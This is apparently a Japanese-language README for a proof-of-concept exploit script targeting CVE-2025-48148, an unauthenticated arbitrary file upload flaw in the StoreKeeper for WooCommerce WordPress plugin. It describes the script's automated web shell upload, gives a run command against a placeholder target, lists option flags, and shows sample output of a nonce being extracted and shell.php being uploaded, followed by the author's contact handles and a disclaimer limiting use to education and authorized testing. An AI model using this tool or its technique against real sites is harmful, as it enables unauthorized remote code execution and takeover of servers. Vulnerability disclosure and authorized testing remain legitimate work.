
StoreKeeper for WooCommerce <= 14.4.4 - 未認証の任意ファイルアップロード
StoreKeeper for WooCommerce <= 14.4.4 - 認証なし任意ファイルアップロード
StoreKeeper for WooCommerce WordPress プラグインは、14.4.4 までの全バージョンにおいてファイルタイプの検証が欠如しているため、任意ファイルアップロードに対して脆弱です。
これにより、認証されていない攻撃者が影響を受けるサイトのサーバーに任意のファイルをアップロードでき、リモートコード実行につながる可能性があります。
スクリプト名: CVE-2025-48148.py
このスクリプトは、StoreKeeper for WooCommerce プラグインを使用して、脆弱な WordPress サイトにウェブシェルをアップロードするプロセスを自動化するために設計された、CVE-2025-48148 用のプロフェッショナルな概念実証エクスプロイトです。
nonce トークンをターゲット URL から直接取得するため、値が変更されても確実に機能します。python3 CVE-2025-48148.py -u "http://target.com/wordpress/"
オプションフラグ:
--debug 冗長な出力を有効にします。--insecure SSL 証明書の検証をスキップします。例:
[*] Extracting nonce...
[+] Nonce extracted: 66e372c7e0
[+] Shell file created: shell.php
[*] Uploading shell...
[+] Upload response:
{"success":true,"data":{"url":"http://target.com/wp-content/uploads/shell.php"}}
📧 メール: [email protected]
📨 Telegram: @Kxploit
このスクリプトは、教育および許可されたペネトレーションテストの目的でのみ提供されます。
本ツールの誤用または損害について、作者は一切の責任を負いません。システムをテストする前に必ず適切な許可を取得してください。
作者: Nxploited ( Khaled Alenazi )